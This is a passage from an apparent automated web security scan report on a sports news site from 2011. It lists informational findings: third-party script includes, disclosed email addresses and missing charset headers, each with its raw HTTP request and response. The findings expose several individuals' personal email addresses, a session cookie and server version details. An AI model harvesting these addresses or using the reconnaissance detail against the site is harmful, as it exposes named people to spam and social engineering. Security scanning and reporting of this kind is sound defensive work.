ETag: "df445160dafd8398dd6004766960ad4b"
Date: Tue, 15 Feb 2011 15:55:50 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 104585
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.86. http://bleacherreport.com/who_should_write_for_br  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /who_should_write_for_br

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /who_should_write_for_br HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 53
ETag: "df2750b76ca6308f28aed4b74f2b0b30"
Date: Tue, 15 Feb 2011 15:57:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 34919
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.87. http://bleacherreport.com/wi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /wi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wi HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 33
ETag: "a9702086d68331456e211b621e6712bb"
Date: Tue, 15 Feb 2011 15:57:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 35089
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

5.88. http://bleacherreport.com/world-football  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /world-football

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /world-football HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 94
ETag: "823042199921223a6ac3000a75948b87"
Date: Tue, 15 Feb 2011 15:54:45 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 71920
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
</script>

        <script src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 15 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://bleacherreport.com/advertise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /advertise

Issue detail

The following email address was disclosed in the response:

Request

GET /advertise HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 36
ETag: "7bf89c66c4d1832b4d15c8e80603c103"
Date: Tue, 15 Feb 2011 15:56:12 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 31444
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:advertise@bleacherreport.com">advertise@bleacherreport.com</a>
...[SNIP]...

6.2. http://bleacherreport.com/articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder

Issue detail

The following email address was disclosed in the response:

Request

GET /articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 424
ETag: "38ec8bbafa7274a003fb330bb60089cc"
Date: Tue, 15 Feb 2011 15:53:43 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 61459
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:theslapshotpucktalk@gmail.com">theslapshotpucktalk@gmail.com</a>
...[SNIP]...

6.3. http://bleacherreport.com/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /contact

Issue detail

The following email address was disclosed in the response:

Request

GET /contact HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 45
ETag: "93675450841bf4a0bce315a82ece0b45"
Date: Tue, 15 Feb 2011 15:57:20 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29406
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:info@bleacherreport.com">
...[SNIP]...

6.4. http://bleacherreport.com/pages/comguidelines  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/comguidelines

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pages/comguidelines HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 41
ETag: "c26cd533bed89ad975fc60c2d5abeb35"
Date: Tue, 15 Feb 2011 15:57:07 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 32800
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:davemorrison@bleacherreport.com">davemorrison@bleacherreport.com</a>
...[SNIP]...
<a href="mailto:administrator@bleacherreport.com">
...[SNIP]...

6.5. http://bleacherreport.com/pages/featuredcolumnists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/featuredcolumnists

Issue detail

The following email address was disclosed in the response:

Request

GET /pages/featuredcolumnists HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 35
ETag: "c679a79be99756d217a567940aff0526"
Date: Tue, 15 Feb 2011 15:57:15 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 29517
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:FC@bleacherreport.com">FC@bleacherreport.com</a>
...[SNIP]...

6.6. http://bleacherreport.com/pages/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /pages/privacy HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 53
ETag: "1768dfa5ac3cc82a63baa78cd227c4b0"
Date: Tue, 15 Feb 2011 15:56:42 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 41824
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:support%40bleacherreport.com">support@bleacherreport.com</a>
...[SNIP]...

6.7. http://bleacherreport.com/pages/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /pages/terms

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pages/terms HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 32
ETag: "0ac55140011e9ac010fed527c864e507"
Date: Tue, 15 Feb 2011 15:56:51 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 57982
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
ages, including changes to features of the Service and special offers.&nbsp; You may opt out or change the frequency of certain email communications from Bleacher Report by sending an email message to support@bleacherreport.com, with the word "No email" in the subject field, or by sending mail to the following postal address:&nbsp; &nbsp;<br>
...[SNIP]...
<br>To report Terms of Use abuse, please email: TOU@bleacherreport.com<br>
...[SNIP]...
<br>If you wish to terminate your Bleacher Report account, you may discontinue using the Service by sending an email message to support@bleacherreport.com with the words "Terminate account" in the subject field, by following the instructions (if any) on the Site, or by sending mail to the following postal address:&nbsp; &nbsp;<br>
...[SNIP]...
leacher Report is not responsible for any automatic filtering you or your network provider may apply to email notifications we send to the email address you provide us. &nbsp;We recommend that you add info@bleacherreport.com to your email address book to help ensure you receive email notifications from us.</p>
...[SNIP]...
<br>Email: DMCA@bleacherreport.com<br>
...[SNIP]...

6.8. http://bleacherreport.com/partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /partners

Issue detail

The following email address was disclosed in the response:

Request

GET /partners HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 28
ETag: "1c068a4ad2ad0c123d1e8296155257bc"
Date: Tue, 15 Feb 2011 15:56:38 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 30882
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:partners@bleacherreport.com">partners@bleacherreport.com</a>
...[SNIP]...

6.9. http://bleacherreport.com/press-room  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /press-room

Issue detail

The following email address was disclosed in the response:

Request

GET /press-room HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 42
ETag: "4d12fb6d689be2555ce4b5bc50207ce5"
Date: Tue, 15 Feb 2011 15:56:11 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 35860
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:Mary.Scott@Matter-Edelman.com">Mary.Scott@Matter-Edelman.com</a>
...[SNIP]...

6.10. http://bleacherreport.com/users/299610-hank-epton  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/299610-hank-epton

Issue detail

The following email address was disclosed in the response:

Request

GET /users/299610-hank-epton HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 701
ETag: "8be86ac81a40ed17fe032c95ef4b6c42"
Date: Tue, 15 Feb 2011 15:55:33 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 88394
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:hankepton@yahoo.com">hankepton@yahoo.com</a>
...[SNIP]...

6.11. http://bleacherreport.com/users/347058-andrew-bailey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/347058-andrew-bailey

Issue detail

The following email address was disclosed in the response:

Request

GET /users/347058-andrew-bailey HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 943
ETag: "71827f3306b741d66cfbf25d13fed0a8"
Date: Tue, 15 Feb 2011 15:55:56 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 107477
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:julietwilton@hotmail.com">julietwilton@hotmail.com</a>
...[SNIP]...

6.12. http://bleacherreport.com/users/350986-james-schmidt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/350986-james-schmidt

Issue detail

The following email address was disclosed in the response:

Request

GET /users/350986-james-schmidt HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 755
ETag: "657db09ff5c4d2e499c1639f85cef8c7"
Date: Tue, 15 Feb 2011 15:56:00 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 110587
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:jameschmidt1@gmail.com">jameschmidt1@gmail.com</a>
...[SNIP]...

6.13. http://bleacherreport.com/users/41310-kevin-mcgrady  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /users/41310-kevin-mcgrady

Issue detail

The following email address was disclosed in the response:

Request

GET /users/41310-kevin-mcgrady HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 676
ETag: "5398d99bb424b9fc54159730c4d7041b"
Date: Tue, 15 Feb 2011 15:55:53 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 106236
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:henry076@centurytel.net">henry076@centurytel.net</a>
...[SNIP]...

6.14. http://bleacherreport.com/who_should_write_for_br  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /who_should_write_for_br

Issue detail

The following email address was disclosed in the response:

Request

GET /who_should_write_for_br HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 53
ETag: "df2750b76ca6308f28aed4b74f2b0b30"
Date: Tue, 15 Feb 2011 15:57:26 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 34919
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<a href="mailto:newwriters@bleacherreport.com">
...[SNIP]...

6.15. http://bleacherreport.com/wi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /wi

Issue detail

The following email address was disclosed in the response:

Request

GET /wi HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 33
ETag: "a9702086d68331456e211b621e6712bb"
Date: Tue, 15 Feb 2011 15:57:22 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 35089
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<p class="intro">Questions can be directed to Max Tcheyan, Internship Manager: max@bleacherreport.com</p>
...[SNIP]...

7. HTML does not specify charset  previous
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


7.1. http://bleacherreport.com/articles/608599-2011-nfl-draft-five-1st-round-prospects-with-bust-potential  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /articles/608599-2011-nfl-draft-five-1st-round-prospects-with-bust-potential

Request

GET /articles/608599-2011-nfl-draft-five-1st-round-prospects-with-bust-potential HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Connection: close
Status: 500
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 9931

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en">

<head>
   <meta charset="utf-8">
   <title>Bleacher Report</title>
   <link href="/stylesheets/redesign/common/reset.css" media=
...[SNIP]...

7.2. http://bleacherreport.com/home/deploy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /home/deploy

Request

GET /home/deploy HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Connection: close
Status: 500
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 9931

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en">

<head>
   <meta charset="utf-8">
   <title>Bleacher Report</title>
   <link href="/stylesheets/redesign/common/reset.css" media=
...[SNIP]...

7.3. http://bleacherreport.com/polls/create  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bleacherreport.com
Path:   /polls/create

Request

GET /polls/create HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Connection: close
Status: 500
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)
Content-Length: 9931

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en">

<head>
